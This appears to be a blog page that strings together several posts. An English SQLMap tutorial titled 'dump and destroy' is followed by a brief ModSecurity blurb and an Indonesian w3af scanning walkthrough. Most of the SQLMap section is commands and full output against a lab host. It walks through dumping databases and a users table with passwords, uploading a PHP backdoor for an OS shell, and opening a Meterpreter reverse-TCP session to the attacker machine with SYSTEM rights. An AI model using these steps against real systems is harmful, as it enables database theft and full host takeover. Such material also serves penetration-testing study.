How to: SQLMap (dump and destroy)

SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap rather than just as “a database dumper tool”.

I will separate this in 3 section, as a fingerprinter (we already knew this), as an enumerator (of course), and as a destroyer (hmm..?!). Check it out.

Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818"

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:26:52

[22:26:52] [INFO] using '/pentest/database/sqlmap/output/192.168.1.102/session' as session file
[22:26:52] [INFO] resuming match ratio '0.972' from session file
[22:26:52] [INFO] resuming injection point 'GET' from session file
[22:26:52] [INFO] resuming injection parameter 'id' from session file
[22:26:52] [INFO] resuming injection type 'numeric' from session file
[22:26:52] [INFO] resuming 0 number of parenthesis from session file
[22:26:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:26:52] [INFO] resuming remote absolute path of temporary files directory 'C:/WINDOWS/Temp' from session file
[22:26:52] [INFO] testing connection to the target url
[22:26:52] [INFO] testing for parenthesis on injectable parameter
[22:26:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.12, PHP 5.3.0
back-end DBMS: MySQL 5


[*] shutting down at: 22:26:52

Yes, we knew this at all. Dump the database engine, the version, and the operating system information.

Enumerate Database

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --dbs

---------------------------------------------------------------------

[22:28:41] [INFO] fetching database names
[22:28:41] [INFO] fetching number of databases
[22:28:41] [INFO] retrieved: 6
[22:28:41] [INFO] retrieved: information_schema
[22:28:44] [INFO] retrieved: cdcol
[22:28:45] [INFO] retrieved: mysql
[22:28:46] [INFO] retrieved: phpmyadmin
[22:28:47] [INFO] retrieved: test
[22:28:48] [INFO] retrieved: webappdb
available databases [6]:
[*] cdcol
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] test
[*] webappdb

Dump the database, yes..SQLMap always do the great stuff!

Enumerate tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" -D webappdb --tables

[22:32:32] [INFO] fetching tables for database 'webappdb'
[22:32:32] [INFO] fetching number of tables for database 'webappdb'
[22:32:32] [INFO] retrieved: 2
[22:32:33] [INFO] retrieved: guestbook
[22:32:34] [INFO] retrieved: users
Database: webappdb
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

Dump the tables

[22:36:54] [INFO] fetching columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of columns for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 4
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': id
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': name
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': country
[22:36:54] [INFO] fetching entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] fetching number of entries for table 'users' on database 'webappdb'
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 1
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': admin
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 123456
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': ID
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 2
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': secret
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': password
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': SG
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': 3
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup
[22:36:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.1.102/session': backup12
Database: webappdb
Table: users
[3 entries]
+---------+----+--------+----------+
| country | id | name   | password |
+---------+----+--------+----------+
| ID      | 1  | admin  | 123456   |
| ID      | 2  | secret | password |
| SG      | 3  | backup | backup12 |
+---------+----+--------+----------+

[22:36:54] [INFO] Table 'webappdb.users' dumped to CSV file '/pentest/database/sqlmap/output/192.168.1.102/dump/webappdb/users.csv'
[22:36:54] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.1.102'

[*] shutting down at: 22:36:54

SQLMap do a great job so far 🙂 Next, take over the system!!

Remote Command Execution

root@bt:/pentest/database/sqlmap#./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --os-shell

[22:51:25] [INFO] trying to upload the uploader agent

which web application language does the web server support?


[1] ASP (default)
[2] PHP
[3] JSP
>2
[22:51:27] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/]:
[22:51:28] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [C:/xampp/htdocs/]:
[22:51:28] [INFO] the uploader agent has been successfully uploaded on 'C:/xampp/htdocs/' ('http://192.168.1.102:80/tmpuduwd.php')
[22:51:28] [INFO] the backdoor has probably been successfully uploaded on 'C:/xampp/htdocs/', go with your browser to 'http://192.168.1.102:80//tmpbpjbr.php' and enjoy it!
[22:51:28] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
>2 ipconfig
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:
---
Windows IP Configuration
Ethernet adapter Local Area Connection 2:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 192.168.1.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
---
os-shell>

The Metasploit’s Meterpreter over SQL Injection

root@bt:/pentest/database/sqlmap# ./sqlmap.py --url "http://192.168.1.102/vid.php?id=818" --msf-path=/opt/metasploit3/msf3 --os-pwn

This time, SQLMap will upload an php file contain shell_exec in order to execute arbitrary command to the remote system via php. After uploaded, SQLMap will trigger the msfpayload (Metasploit Payload) to build “portable executable” meterpreter backdoor. It will be encoded and uploaded via php shell.

When uploaded, SQLMap will trigger “Metasploit listener” called Multi/handler and waiting for the “portable exe backdoor” to be executed. After it executed, the meterpreter shell will come up 🙂
I will skip some information here, because it is too long to be dropped here.
—-the process before this line was creating the php shell and upload to document root—–
[22:57:05] [INFO] creating Metasploit Framework 3 payload stager
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>1


which is the local address? [192.168.1.100]
which local port number do you want to use? [31503]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1
which payload encoding do you want to use?
[1] No Encoder
[2] Alpha2 Alphanumeric Mixedcase Encoder
[3] Alpha2 Alphanumeric Uppercase Encoder
[4] Avoid UTF8/tolower
[5] Call+4 Dword XOR Encoder
[6] Single-byte XOR Countdown Encoder
[7] Variable-length Fnstenv/mov Dword XOR Encoder
[8] Polymorphic Jump/Call XOR Additive Feedback Encoder
[9] Non-Alpha Encoder
[10] Non-Upper Encoder
[11] Polymorphic XOR Additive Feedback Encoder (default)
[12] Alpha2 Alphanumeric Unicode Mixedcase Encoder
[13] Alpha2 Alphanumeric Unicode Uppercase Encoder
> 11
[22:57:46] [INFO] creation in progress ................ done
[22:58:03] [INFO] compression in progress . done
[22:58:04] [INFO] uploading payload stager to 'C:/xampp/htdocs/tmpmtonj.exe'
[22:58:04] [INFO] running Metasploit Framework 3 command line interface locally, wait..
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.100:31503
[*] Starting the payload handler...
[22:58:27] [INFO] running Metasploit Framework 3 payload stager remotely, wait..
[*] Sending stage (748544 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.100:31503 -> 192.168.1.102:2561)
meterpreter> Loading extension espia...success.
meterpreter> Loading extension incognito...success.
meterpreter> Loading extension priv...success.
meterpreter> Loading extension sniffer...success.
meterpreter> Computer: XP_FDCC
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter> Server username: NT AUTHORITYSYSTEM
meterpreter>

meterpreter> shell
Process 3128 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:>



OS Pwned!

OWASP ModSecurity Core Ruleset

ModSecurity is a good starting point to secure your web site. OWASP provides the core rule set (CRS) for ModSecurity rules against the most critical web application attack.

From OWASP:

ModSecurity is an Apache web server module that provides a web application firewall engine. The ModSecurity Rules Language engine is extrememly flexible and robust and has been referred to as the “Swiss Army Knife of web application firewalls.”

In order to enable users to take full advantage of ModSecurity out of the box, we have developed the Core Rule Set (CRS) which provides critical protections against attacks across most every web architecture.

Check OWASP Core Rule Set home page for more info.

Download here

Audit website dengan w3af

Overview

w3af (Web Application Attack and Audit Framework) hampir mirip dengan metasploit, bedanya hanya pada objek yang dikerjakan. w3af fokus pada bagian aplikasi web, sedangkan metasploit lebih ke sistem operasi secara keseluruhan. w3af gratis dan opensource, terdiri dari beberapa bagian plugin untuk serangan yaitu mangle, grep, discovery, audit, evasion, dan bruteforce.

Persiapan

Untuk persiapan menggunakan w3af, banyak program berbasis python yang harus diinstal seperti python-soappy, python-pyopenssl, dll. Saya sendiri menginstallnya di Linux Mint 5.0 yang berbasis Ubuntu, sehingga sedikit tidak merepotkan (karena keluarga Debian yang memudahkan semua perkara instalasi dan dependensi paket). Panduan instalasi terdapat pada situs w3af yang berbasis sourceforge.

Ketika semuanya sudah terinstall, bisa segera dimulai:

$ ./w3af
w3af>>>

Gunakan perintah ‘help’ untuk melihat bantuan (wajib):

w3af>>> help
The following commands are available:
help You are here. help [command] prints more specific help.
http-settings Configure the URL opener.
misc-settings Configure w3af misc settings.
plugins Enable, disable and configure plugins.
profiles List and start scan profiles.
start Start site analysis.
exploit Exploit a vulnerability.
tools Enter the tools section.
target Set the target URL.
version Show the w3af version.
exit Exit w3af.
w3af>>>

w3af berbeda dengan console pada metasploit, saya sendiri pada awalnya bingung namun dengan sedikit pemahaman, akhirnya dapat dimengerti bahwa penggunaan console pada w3af adalah dengan mengetikan setiap list yang muncul pada menu help, untuk kembali ke menu awal tinggal mengetikkan ‘back’. Kita akan mencobanya langsung pada salah satu target.

Konfigurasi

w3af>>> target
w3af/target>>> help
The following commands are available:
help You are here. help [command|parameter] prints more specific help.
set Set a parameter value.
view List all configuration parameters and current values.
back Return to previous menu.
w3af/target>>> set target http://demo.testfire.net
w3af/target>>> view

Target sudah kita set, sekarang plugin untuk auditingnya:

w3af/target>>> back
w3af>>> plugins
w3af/plugins>>> help
The following commands are available:
help You are here. help [command] prints more specific help.
list List all available plugins.
bruteforce Enable and configure bruteforce plugins.
discovery Enable and configure discovery plugins.
output Enable and configure output plugins.
mangle Enable and configure mangle plugins.
audit Enable and configure audit plugins.
evasion Enable and configure evasion plugins.
grep Enable and configure grep plugins.
back Return to previous menu.
w3af/plugins>>>

w3af membutuhkan sedikitnya tiga buah plugin untuk di load, yaitu discovery, audit, dan output. Untuk melihat isi dari masing-masing plugin , jalankan ‘list’ diikuti pluginnya, misal ‘list audit’ maka akan menghasilkan semua isi dari plugin audit seperti xss, xsrf, sql injection, ldap injection, dll. Mengetikan nama plugin (misalkan audit) akan menghasilkan opsi mana yang telah kita set. Contohnya:

w3af/plugins>>> audit xss,sqli,xpath,remoteFileInclude,blindSqli
w3af/plugins>>>

atau bisa juga dengan..

w3af/plugins>>> audit all

Saya akan melakukan test SQL Injection pada sebuah webserver, website linkage dan crawling, memberi laporan secara realtime serta dalam laporan berbentuk html. Berikut langkah-langkahnya.

w3af/plugins>>> audit sqli
w3af/plugins>>> audit
Enabled audit plugins:
sqli
w3af/plugins>>> discovery webSpider,pykto,hmap
w3af/plugins>>> discovery
Enabled discovery plugins:
webSpider
hmap
pykto
w3af/plugins>>> output console,htmlFile
w3af/plugins>>> output
Enabled output plugins:
htmlFile
console
w3af/plugins>>> output config htmlFile
w3af/plugin/htmlFile>>> view
Parameter Value Description
========= ===== ===========
httpFileName output-http.txt File name where this plugin will write HTTP requests and responses
reportDebug False True if debug information will be appended to the report.
fileName report.html File name where this plugin will write to
w3af/plugin/htmlFile>>>

Saya telah melakukan konfigurasi yang sederhana untuk testing ke webserver menggunakan webSpider untuk crawling direktori dan link, lalu pykto untuk audit web (pykto adalah versi python dari nikto), dan hmap untuk host fingerprinting. Hasilnya ditulis pada file output-http.txt dan report.html.

w3af/plugin/htmlFile>>> back
w3af/plugins>>> back
w3af>>>start

silakan menunggu sampai proses auditing selesai.

w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
Auto-enabling plugin: discovery.serverHeader
The Server header for this HTTP server is: squid/2.6.STABLE5
Server uses 503 instead of HTTP 404 error code.
pykto plugin is using “squid/2.6.STABLE5″ as the remote server type. This information was obtained by serverHeader plugin.
Error when requesting: http://demo.testfire.net/
Error: Too many retries when trying to get: http://demo.testfire.net/

http://demo.testfire.net/

pykto plugin found a vulnerability at URL: http://demo.testfire.net/modules.php . Vulnerability description: PHP Nuke module allows user names and passwords to be viewed. See http://www.frog-man.org/tutos/PHP-Nuke6.0-Members_List-Your_Account.txt for other SQL exploits in this module. The vulnerability was found in the request with id 2330.
pykto plugin found a vulnerability at URL: http://demo.testfire.net/bank/ . Vulnerability description: This might be interesting… The vulnerability was found in the request with id 3315.
Hmap web server fingerprint is starting, this may take a while.
hmap: Connection failed to demo.testfire.net:80
New URL found by pykto plugin: http://demo.testfire.net/modules.php
New URL found by pykto plugin: http://demo.testfire.net/bank/

selamat mencoba ^^